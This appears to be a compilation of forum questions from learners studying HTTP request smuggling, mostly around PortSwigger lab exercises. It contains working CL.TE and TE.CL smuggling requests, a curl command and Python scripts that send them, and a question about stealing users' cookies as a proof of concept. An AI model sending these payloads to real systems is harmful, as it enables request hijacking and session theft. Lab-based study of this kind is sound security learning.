HTTP Request Smuggling Basics

I am currently trying to learn HTTP Request Smuggling vulnerability to furthermore enhance my pen testing skill. I have watched a couple of videos on Youtube and read articles online regarding it but still have a couple of questions in mind. Question:

  • What are the attack vectors of HTTP Req Smuggling (Where should I look)?
  • What is the main way to provide PoC to companies with high traffic? I know that HTTP Smuggling could possibly steal people’s cookie, can this be used for the PoC or is this illegal?
  • Can this or other vulnerability be chained together? (e.g. self-xss & csrf)

Thank you everyone!

Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 10 Transfer-Encoding: chunked  0  G  

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $  'POST' \     -H $  'Host:' -H $  'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $  'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $  'Accept-Language: en-US,en;q=0.5' -H $  'Accept-Encoding: gzip, deflate' -H $  'Referer:' -H $  'Connection: close' -H $  'Upgrade-Insecure-Requests: 1' -H $  'Content-Length: 8' \     --data-binary $  '0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \     $  '' 

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():     url = ''     headers = {'Host':'','Connection':'keep-alive',     'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}      data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'      s = requests.Session()     r = requests.Request('POST', url, headers=headers, data=data)     prepared = r.prepare()     response = s.send(prepared)      print(response.request.headers)     print(response.status_code)     print(response.text) 

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X[\n]Transfer-Encoding: chunked 

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python  import pycurl from StringIO import StringIO  buffer = StringIO() c = pycurl.Curl() c.setopt(c.POST, 1) c.setopt(c.URL, '') c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a') #c.setopt(pycurl.POSTFIELDSIZE, 8) c.setopt(c.HTTPHEADER, [     'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',     'Host:',     'Content-Length: 8',     'Transfer-Encoding: chunked',     'Content-Type: application/x-www-form-urlencoded'     ]) #c.setopt(c.CRLF, 1) c.setopt(c.VERBOSE, 1) c.setopt(c.HEADER, 1) c.setopt(c.WRITEDATA, buffer) c.perform() c.close()  body = buffer.getvalue()  print(body) 

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying                                                                                                                             * TCP_NODELAY set                                                                                                                                            * Connected to ( port 443 (#0)                                                      * found 387 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 *        server certificate verification OK *        server certificate status verification SKIPPED *        common name: (matched) *        server certificate expiration date OK *        server certificate activation date OK *        certificate public key: RSA *        certificate version: #3 *        subject: *        start date: Fri, 05 Jul 2019 00:00:00 GMT *        expire date: Wed, 05 Aug 2020 12:00:00 GMT *        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon * ALPN, server did not agree to a protocol > POST / HTTP/1.1 Host: Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0  Content-Length: 8 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded  8 * upload completely sent off: 15 out of 8 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 Internal Server Error < Content-Type: application/json; charset=utf-8 < Connection: close < Content-Length: 23 <  * Closing connection 0 HTTP/1.1 500 Internal Server Error Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 23  "Internal Server Error" 

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.

What does “connection” mean in context of request smuggling

I recently read about request smuggling. This is a very interesting attack that I didn’t know about. A vulnerability to this was recently discovered at Slack, disclosed responsibly and a bounty was awarded.

The linked article says:

When the front-end server forwards HTTP requests to a back-end server, it typically sends several requests over the same back-end network.

Request smuggling uses the fact that multiple requests go over one connection.

My question is: What is this connection? I’m a newbie at networking. I know that there are multiple layers to a connection: IP, TCP, SSL. Can you please explain what is the layer at which this connection exists?

Update: If someone could include an example, preferably in Python, of how one would send multiple requests on the same connection, that’d be helpful.

HTTP request smuggling, basic TE.CL vulnerability

Im trying to learn about http request smuggling and Im trying out the labs for burp suite. Im stuck on the TE.CL vulnerability, Ive clicked on the solution (see below: but the request just times out. Ive disabled ‘update content length’ and changed out mylabid with the current lab id. Is there another setting I am missing?

POST / HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked  5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15  x=1 0\r\n\r\n